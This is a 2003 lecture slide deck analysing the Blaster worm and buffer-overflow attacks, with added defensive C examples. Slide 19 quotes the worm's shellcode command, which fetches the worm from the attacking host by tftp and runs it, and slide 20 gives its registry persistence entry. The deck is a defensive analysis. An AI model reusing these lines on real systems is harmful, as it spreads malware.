Slide 1: Analysis of the Internet Worm of August 2003
INFORMATION AND COMPUTER SCIENCE DEPARTMENT
Dr. K. Salah, September 2003
Slide 2: Agenda
Reasons for Talk
Some Jargon
Ethics of Hackers
Why Can't Our Kids Hack?
Example of Hacker Attacks
W32 Blaster Worm
Smashing the Stack for Fun and Profit
More Information
Slide 3: Reasons for Talk
Know your enemy!
– The Prophet of Islam said, "Whoever learns the language of a people is safe from their cunning" (من تعلم لغة قوم أمن مكرهم).
– "Know your enemy and know yourself and you can fight a hundred battles without disaster," Sun Tzu.
Knowledge is power!
– Understand hacker tactics, strategies, and tricks.
– Be better prepared.
– Design and write better code.
– Take countermeasures.
Know something about the ethics of hackers.
See for yourself how smart the hackers are!
Research
Slide 4: Some Jargon
Hoax vs. Worm vs. Virus
Trojan Horse
Crackers vs. Hackers vs. Intruder
DoS attack
Slide 5: The Hacker Ethic
Hackers have ethics, according to Socrates.
"The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells.
– Translated into 15 languages.
– Hackers are the warriors, explorers, guerrillas, and joyous adventurers of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works.
– Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover.
– http://www.hackerethic.org
– http://www.ils.unc.edu/gbnewby/ethics/index.html
Why hacking?
– Enjoy the challenge and excitement.
– Joy, fun, ego, and recognition.
– Hate Microsoft products and practices.
  – The battle with google.com has started.
Slide 6: Hacker Ethics
Information should be free.
– Driving Linux/Apache and open-source code.
– Technology is only good if you get other people to join you in developing and using it. Information should always be disclosed.
– Not all people can afford to buy software or information.
– No concern for copyright laws/abuses, intellectual property, passwords, data security!
Hacking is essential to show security holes and vulnerabilities.
– So many hackers are security gurus.
– A way to make a living and learn about computers.
Hackers are not doing real harm.
– Pushing technology to its knees.
– "We are just curious and inquisitive people... we want to chart new territory and look around," Craig Neidorf.
– Craig Neidorf is the founder of Phrack Magazine and a member of the 2600 club. His email is route@underground.org.
Slide 7: Kids and Hacking
Kids are very curious, thus are hackers.
They have much more time and fewer responsibilities!
They look for recognition and fun.
Usually kids fall victim and get caught first; the originators of attacks are yet to be found.
What does it really take to be a hacker?
– Some knowledge of C and assembly programming.
– Some knowledge of operating systems.
– Some knowledge of networking (TCP/IP).
– (Beware!!! These are our ICS and COE students!!!)
Slide 8: Kids and Hacking (image slide)
Slide 9: Kids and Hacking (screenshot: "Connected to www.test.com")
Slide 10: Kids and Hacking
Shall we give up hope?
– The 1998 registrar incident.
So, why can't our kids hack?
– Digital divide.
– English.
– Busy and distracted....
Slide 11: Fun, Attacks, or Damages (image slide)
Slide 12: Fun, Attacks, or Damages (image slide)
Slide 13: Fun, Attacks, or Damages (image slide, August 17, 1996)
Slide 14: Fun, Attacks, or Damages (image slide, August 14, 2003)
Slide 15: Fun, Attacks, or Damages (image slide, August 14, 2003)
Slide 16: The Blaster Worm
Affected Windows XP and Windows 2000.
Causes Windows NT to crash when trying to exploit NT machines.
Has so many variants: Blaster-A, Blaster-B, ... Blaster-F.
– Blaster-F was linked to a Romanian student.
This is a worm, not a virus.
Eats up network bandwidth.
Encouraged other hackers to release other worms: Sobig, Welchia, etc.
Microsoft called it, "A security issue has been identified..."
Slide 17: Technical Details
1) An infected system scans the network for any computer listening on TCP port 135 (the Windows RPC/DCOM port).
– TCP port 135 is used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things.
– "The Art of Port Scanning" by fyodor@dhp.com, Phrack Magazine, http://www.phrack.org/show.php?p=51&a=11
Slide 18: Technical Details
2) The infected system attempts to exploit the RPC buffer overflow on those systems listening on TCP port 135.
– The buffer overflow attack will be explained later.
Slide 19: Technical Details
3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an egg) and hatch it:
– starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm, "msblast.exe"
– inside the shellcode, runs the command: "cmd \c tftp –i appaddress worm.exe & worm.exe & exit"
– "msblast.exe" is packed with the UPX compression utility, is self-extracting, and is 11KB once unpacked.
Slide 20: Technical Details
4) "msblast.exe" gets executed and starts the scanning process for computers listening on TCP port 135.
– A text string in the worm code reads, "I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!"
– The code creates a mutex called "BILLY" to avoid running multiple times.
– It also adds a registry entry so that it always runs on Windows restart: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe"
Slide 21: Technical Details
A secondary payload in the worm is supposed to cause all infected systems to launch a DoS attack against Microsoft's windowsupdate.com website on 16 August 2003.
– Why August 16?
– Any relation to the DOJ hack?
If the worm cannot find a DNS entry for windowsupdate.com, it uses 255.255.255.255, causing broadcast traffic and flooding the network.
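As an added illustration of the scanning step in the technical details above (not code from the slides): a small detector that reads constructed firewall-style log lines and flags any source fanning out to many distinct hosts on TCP 135, which is the traffic pattern a defender would watch for. The log lines, addresses and threshold are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define RPC_PORT 135   /* Windows RPC/DCOM port the worm scans for */
#define MAXHOSTS 32

/* Constructed firewall-style log lines for this example: "src dst dport". */
static const char *LOG[] = {
    "10.0.0.5 10.0.0.1 135", "10.0.0.5 10.0.0.2 135",
    "10.0.0.5 10.0.0.3 135", "10.0.0.5 10.0.0.4 135",
    "10.0.0.5 10.0.0.6 135", "10.0.0.5 10.0.0.6 135", /* repeat: counted once */
    "10.0.0.7 10.0.0.1 80",  "10.0.0.7 10.0.0.1 135", /* port 80: ignored */
};
#define NLOG (sizeof LOG / sizeof LOG[0])

static int in_list(char list[][16], int n, const char *s)
{
    for (int i = 0; i < n; i++)
        if (strcmp(list[i], s) == 0) return 1;
    return 0;
}

/* Distinct hosts that 'src' connected to on TCP 135. One host fanning out
   to many peers on 135 is the signature of the worm's scanning step. */
int distinct_rpc_targets(const char *src)
{
    char seen[MAXHOSTS][16], s[16], d[16];
    int nseen = 0, port;
    for (size_t i = 0; i < NLOG; i++) {
        if (sscanf(LOG[i], "%15s %15s %d", s, d, &port) != 3) continue;
        if (port != RPC_PORT || strcmp(s, src) != 0) continue;
        if (!in_list(seen, nseen, d) && nseen < MAXHOSTS)
            snprintf(seen[nseen++], 16, "%s", d);
    }
    return nseen;
}

/* Evaluate each source once; returns how many exceeded 'threshold'. */
int flag_scanners(int threshold)
{
    char done[MAXHOSTS][16], s[16];
    int ndone = 0, flagged = 0;
    for (size_t i = 0; i < NLOG; i++) {
        if (sscanf(LOG[i], "%15s", s) != 1 || in_list(done, ndone, s)) continue;
        if (ndone < MAXHOSTS) snprintf(done[ndone++], 16, "%s", s);
        int n = distinct_rpc_targets(s);
        if (n > threshold) flagged++;   /* a real tool would report 's' here */
    }
    return flagged;
}
```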
Slide 22: Buffer Overflow Attack
First rule of hacking: do everything you are not supposed to?
– If you can't change the flow of execution, crash it!
Started with the Robert Morris worm in 1988, exploiting a buffer overflow vulnerability in fingerd.
The Code Red worm of 2001 exploited a buffer overflow vulnerability in Microsoft IIS (Internet Information Server).
The new MS Blaster of 2003 exploits a buffer overflow vulnerability in MS DCOM/RPC.
The next attack will most likely be linked to a buffer overflow.
(Chart: CERT security alerts by year, up to the first two months of 2002.)
Slide 23: Buffer Overflow Attack
The best article on the know-how details of the buffer overflow is in Phrack Magazine, issue 49 (1996): "Smashing the Stack for Fun and Profit," by AlephOne@underground.org, http://www.phrack.org/show.php?p=49&a=14
Slide 24: Buffer Overflow Attack (image slide)
Slide 25: Buffer Overflow Attack (image slide)
Slide 26: Buffer Overflow Attack
Partial list of unsafe functions in the standard C library:
Slide 27: Buffer Overflow Attack Countermeasures
Validate all arguments or parameters received whenever you write a function.
– Bounds checking.
– Performance is compromised!!
Use secure functions instead, e.g., strncpy() and strncat().
Use safe compilers.
– Watch out for free compilers!!! They can be made by hackers, for hackers!
Test your code thoroughly.
Keep applying patches.
A good site for advisories is CERT at Carnegie Mellon's Software Engineering Institute.
– http://www.cert.org/advisories
Can this attack ever be eliminated?
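An added worked example of the bounds-checking and "secure function" advice above (not code from the slides): the unchecked strcpy() pattern next to a bounded copy that validates its arguments and refuses oversized input, plus the strncpy() termination caveat and a bounded append. The function names are this example's own.

```c
#include <stddef.h>
#include <string.h>

/* The pattern behind the unsafe-function list: nothing bounds the copy, so
   input longer than 'dst' overwrites whatever follows it on the stack. */
void copy_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Length of s, never looking beyond 'max' bytes (a portable strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Bounds-checked replacement: validates its arguments and refuses (rather
   than silently truncating) input that would not fit, so the caller decides. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0) return -1;
    size_t n = bounded_len(src, dstsz);
    if (n >= dstsz) return -1;        /* no room for the terminator */
    memcpy(dst, src, n + 1);
    return 0;
}

/* strncpy() caveat: it does not NUL-terminate when src fills the buffer, so
   a later strlen() or printf() would read past the end. Always terminate. */
void copy_strncpy_terminated(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0) return;
    strncpy(dst, src, dstsz - 1);
    dst[dstsz - 1] = '\0';
}

/* Bounds-checked append in the spirit of strncat(): -1 if it would not fit. */
int append_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t used = bounded_len(dst, dstsz);
    if (used >= dstsz) return -1;     /* dst itself is not terminated */
    size_t room = dstsz - used - 1;
    size_t n = bounded_len(src, room + 1);
    if (n > room) return -1;
    memcpy(dst + used, src, n + 1);
    return 0;
}
```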
Slide 28: Research on Protecting the Stack
A good number of references is found in:
– http://www.crhc.uiuc.edu/EASY/Papers02/EASY02-xu.pdf
How?
– Splitting the control stack from the data stack: the control stack contains return addresses, the data stack contains local variables and passed parameters.
– Use middleware software (libsafe) to intercept calls to library functions known to be vulnerable.
– Use StackGuard and StackShield: add more code at the beginning and end of each function, check whether the return address has been altered, and signal a violation.
– Others.
– Performance due to overhead is always an issue!
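An added model of the StackGuard/StackShield idea described above (not code from the slides or from those projects): one simulated frame as a C struct with a canary word between the local buffer and the saved return address, the prologue/epilogue checks, and an unbounded copy that the checks catch. The struct layout, canary value and return address are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed model of one stack frame: a local buffer, a StackGuard-style
   canary word, and the saved return address that sits above it. */
#define BUF_SIZE 16
struct frame {
    char buf[BUF_SIZE];
    uint32_t canary;
    uint32_t ret_addr;
};

/* Constructed value; StackGuard chooses its canary when the program starts. */
static const uint32_t CANARY = 0xA5C3E1F7u;
/* StackShield-style shadow copy of the return address, kept off the stack. */
static uint32_t shadow_ret;

/* Code StackGuard/StackShield add at function entry. */
void frame_enter(struct frame *f, uint32_t ret)
{
    memset(f->buf, 0, BUF_SIZE);
    f->canary = CANARY;
    f->ret_addr = ret;
    shadow_ret = ret;
}

/* Code added before return: 1 = frame intact, 0 = canary clobbered,
   -1 = return address differs from the shadow copy. A real build would
   signal the violation and abort instead of returning. */
int frame_leave(const struct frame *f)
{
    if (f->canary != CANARY) return 0;
    if (f->ret_addr != shadow_ret) return -1;
    return 1;
}

/* The defect these checks exist for: n bytes copied into a 16-byte local
   with no bound. The write stays inside 'f', so the model itself is defined. */
int copy_then_check(const char *src, size_t n)
{
    struct frame f;
    if (n > sizeof f) n = sizeof f;
    frame_enter(&f, 0x08048000u);   /* constructed return address */
    memcpy(&f, src, n);             /* overruns buf when n > BUF_SIZE */
    return frame_leave(&f);
}
```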
Slide 29: The Adventure Continues
Bypassing the fix for smashing the stack:
– Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard. http://www.immunix.org/documentation.html
– In the May 2000 issue of Phrack Magazine (www.phrack.org): "Bypassing StackGuard and StackShield" by Bulba and Kil3r.
Slide 30: Curious about More Hacking Techniques
Compulsory reading: "Hacking Exposed".
Slide 31
A copy of this PPT presentation can be found at http://www.ccse.kfupm.edu.sa/~salah under the MISC section.